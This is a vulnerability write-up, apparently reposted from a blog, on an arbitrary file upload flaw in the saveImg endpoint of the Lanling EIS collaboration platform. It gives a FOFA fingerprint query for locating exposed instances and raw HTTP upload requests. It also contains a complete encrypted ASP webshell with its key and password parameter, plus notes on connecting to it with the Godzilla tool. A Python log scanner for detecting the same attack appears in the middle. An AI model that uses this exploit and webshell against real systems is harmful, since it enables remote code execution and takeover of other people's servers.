There is an arbitrary file upload vulnerability in the saveImg interface of Lanling EIS smart collaboration platform

Disclaimer: Please do not use the techniques described in this article for illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article are the responsibility of the user alone; any adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.

1. Introduction to Lanling EIS

Lanling Smart Collaboration Platform EIS integrates a rich set of modules to meet the needs of organizations and enterprises in knowledge management, collaboration, project management and system construction.

2. Vulnerability description

Lanling Intelligent Collaboration Platform EIS integrates a rich set of modules to meet the needs of organizations and enterprises in knowledge management, collaboration, project management and system construction. The platform's saveImg interface contains an arbitrary file upload vulnerability through which a webshell can be uploaded.

3. Affected versions

Lanling Intelligent Collaboration Platform EIS

4. fofa query statement

icon_hash="953405444"

5. Recurrence of vulnerabilities

Vulnerability link: http://127.0.0.1/eis/service/api.aspx?action=saveImg

Vulnerability packet:

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Length: 179
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

578321995
--25c172e79b2758a7d7ff9fe9cab4a76d--

After the request is sent, the response returns the path of the uploaded file.


Concatenated path of the uploaded file: http://127.0.0.1/files/editor_img/20231019212439970030/20231019212439970030.asp
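As a defender-side check added here (it is not part of the original post), the following Python scans IIS-style access log lines for the pattern this writeup describes: a POST to api.aspx?action=saveImg followed by a request for a server-side script under /files/editor_img/. The log field layout, timestamps and client addresses are constructed for illustration.

```python
import re
from os.path import splitext
from urllib.parse import parse_qs

# IIS script extensions; an image-upload directory should never serve these.
SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}
UPLOAD_ENDPOINT = "/eis/service/api.aspx"
UPLOAD_DIR = "/files/editor_img/"

# Constructed sample log (fields: date time method uri-stem uri-query client-ip status).
SAMPLE_LOG = """\
2023-10-19 21:24:39 POST /eis/service/api.aspx action=saveImg 203.0.113.5 200
2023-10-19 21:24:41 GET /files/editor_img/20231019212439970030/20231019212439970030.asp - 203.0.113.5 200
2023-10-19 21:25:02 POST /eis/service/api.aspx action=saveImg 198.51.100.7 200
2023-10-19 21:25:05 GET /files/editor_img/20231019212502111111/20231019212502111111.png - 198.51.100.7 200
2023-10-19 21:26:00 GET /eis/login.aspx - 198.51.100.9 200
"""

LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")

def parse_line(line):
    """Split one constructed log line into a dict; return None for unparseable lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, method, stem, query, client, status = m.groups()
    return {"ts": ts, "method": method.upper(), "stem": stem,
            "query": "" if query == "-" else query, "client": client, "status": int(status)}

def analyze(log_text):
    """Return (severity, client_ip, detail) findings for saveImg upload abuse."""
    findings, uploaders = [], set()
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        stem_l = rec["stem"].lower()
        actions = [v.lower() for v in parse_qs(rec["query"]).get("action", [])]
        if rec["method"] == "POST" and stem_l == UPLOAD_ENDPOINT and "saveimg" in actions:
            uploaders.add(rec["client"])          # every upload is worth an audit trail entry
            findings.append(("info", rec["client"], f"saveImg upload at {rec['ts']}"))
        elif stem_l.startswith(UPLOAD_DIR) and splitext(stem_l)[1] in SCRIPT_EXTS:
            # A script served from the image directory is the webshell being reached;
            # escalate if the same client performed an upload earlier in the log.
            sev = "critical" if rec["client"] in uploaders else "high"
            findings.append((sev, rec["client"], f"script served from upload dir: {rec['stem']}"))
    return findings
```

A `.png` fetched from the same directory produces no finding, so only the script-extension case is escalated.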

Burp request:

POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=25c172e79b2758a7d7ff9fe9cab4a76d
Content-Length: 1950

--25c172e79b2758a7d7ff9fe9cab4a76d
Content-Disposition: form-data; name="file"; filename="50514.asp"
Content-Type: text/html

<%
Set bypassDictionary = Server.CreateObject("Scripting.Dictionary")

Function Base64Decode(ByVal vCode)
    Dim oXML, oNode
    Set oXML = CreateObject("Msxml2.DOMDocument.3.0")
    Set oNode = oXML.CreateElement("base64")
    oNode.dataType = "bin.base64"
    oNode.text = vCode
    Base64Decode = oNode.nodeTypedValue
    Set oNode = Nothing
    Set oXML = Nothing
End Function

Function decryption(content,isBin)
    dim size,i,result,keySize
    keySize = len(key)
    Set BinaryStream = CreateObject("ADODB.Stream")
    BinaryStream.CharSet = "iso-8859-1"
    BinaryStream.Type = 2
    BinaryStream.Open
    if IsArray(content) then
        size=UBound(content)+1
        For i=1 To size
            BinaryStream.WriteText chrw(ascb(midb(content,i,1)) Xor Asc(Mid(key,(i mod keySize)+1,1)))
        Next
    end if
    BinaryStream.Position = 0
    if isBin then
        BinaryStream.Type = 1
        decryption=BinaryStream.Read()
    else
        decryption=BinaryStream.ReadText()
    end if

End Function
    key="3c6e0b8a9c15224a"
    content=request.Form("123456")
    if not IsEmpty(content) then

        if  IsEmpty(Session("payload")) then
            content=decryption(Base64Decode(content),false)
            Session("payload")=content
            response.End
        else
            content=decryption(Base64Decode(content),true)
            bypassDictionary.Add "payload",Session("payload")
            Execute(bypassDictionary("payload"))
            result=run(content)
            response.Write("ca0be7")
            if not IsEmpty(result) then
                response.Write Base64Encode(decryption(result,true))
            end if
            response.Write("2d6353")
        end if
    end if
%>
--25c172e79b2758a7d7ff9fe9cab4a76d--

6. Deep recurrence

1. Send like flowers


2. Godzilla direct connection



Origin blog.csdn.net/holyxp/article/details/134117897